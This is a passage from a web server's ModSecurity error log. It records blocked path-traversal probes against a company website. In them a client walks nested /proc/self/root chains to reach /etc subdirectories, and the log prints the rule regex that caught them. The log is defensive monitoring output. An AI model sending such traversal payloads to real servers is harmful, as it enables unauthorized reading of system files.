https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 10:56:27.991479 2026] [:error] [pid 2473:tid 140411691570944] [client 74.7.243.203:41026] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abldi6BJNF7axNlVR0UE6AAAAAY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 10:56:29.327462 2026] [:error] [pid 8555:tid 140411658000128] [client 74.7.243.203:41038] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abldjc36KAxay5pmeQfDMgAAAYo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 10:56:30.692561 2026] [:error] [pid 9299:tid 140411683178240] [client 74.7.243.203:35408] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abldjr-sgTmmJoPuMdynKQAAAsc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 10:56:31.958380 2026] [:error] [pid 7437:tid 140411658000128] [client 74.7.243.203:35420] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abldjweiSKl8TjouI-YJuwAAA8o"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 10:56:34.641330 2026] [:error] [pid 17965:tid 140411641214720] [client 74.7.243.203:35422] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abldkqt8Nd0UC_OcbVG40gAAAIw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 10:56:36.022302 2026] [:error] [pid 11293:tid 140411641214720] [client 74.7.243.203:35428] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abldlNCmCSWTlPouqorUqQAAAMw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 10:56:37.255182 2026] [:error] [pid 7437:tid 140411658000128] [client 74.7.243.203:35438] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abldlQeiSKl8TjouI-YJvQAAA8o"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 10:56:38.571054 2026] [:error] [pid 18709:tid 140411674785536] [client 74.7.243.203:35452] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abldljarLhPAjZGI1b22egAAA4g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 10:56:41.042014 2026] [:error] [pid 9155:tid 140411548894976] [client 74.7.243.203:35464] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abldmdbI7zhHXcabyMUtvgAAAlc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 10:56:42.417127 2026] [:error] [pid 8555:tid 140411741927168] [client 74.7.243.203:46454] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abldms36KAxay5pmeQfDNwAAAYA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 10:56:43.683458 2026] [:error] [pid 2325:tid 140411733534464] [client 74.7.243.203:46470] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abldm-82sZHvlq4xgHrMQgAAAoE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 10:56:44.944053 2026] [:error] [pid 2473:tid 140411741927168] [client 74.7.243.203:46486] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abldnKBJNF7axNlVR0UE7gAAAAA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 10:56:47.489048 2026] [:error] [pid 8856:tid 140411590858496] [client 74.7.243.203:46500] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abldnnUHeC6oxrTQ0VC22AAAAdI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 10:56:50.949153 2026] [:error] [pid 18709:tid 140411674785536] [client 74.7.243.203:46516] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abldojarLhPAjZGI1b22gAAAA4g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 10:56:52.334448 2026] [:error] [pid 17965:tid 140411658000128] [client 74.7.243.203:55768] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abldpKt8Nd0UC_OcbVG41QAAAIo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 10:56:54.827953 2026] [:error] [pid 9498:tid 140411540502272] [client 74.7.243.203:55780] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abldpXdMvNrBGNI28whfwwAAAxg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 10:56:56.235414 2026] [:error] [pid 2325:tid 140411733534464] [client 74.7.243.203:55784] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abldqO82sZHvlq4xgHrMRgAAAoE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 10:56:57.379477 2026] [:error] [pid 8298:tid 140411641214720] [client 74.7.241.46:59980] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/localtime"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abldqZdzf3e7m9lz3ZHOvAAAAQw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 10:56:57.847500 2026] [:error] [pid 7437:tid 140411557287680] [client 74.7.243.203:55786] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abldqQeiSKl8TjouI-YJwgAAA9Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 10:57:01.115000 2026] [:error] [pid 1016:tid 140411708356352] [client 74.7.243.203:55796] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abldrJqmL8PQht4WJFlQDwAAAUQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 10:57:04.227412 2026] [:error] [pid 18709:tid 140411716749056] [client 74.7.243.203:34938] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abldsDarLhPAjZGI1b22hQAAA4M"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 10:57:05.686948 2026] [:error] [pid 18380:tid 140411599251200] [client 74.7.243.203:34946] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag 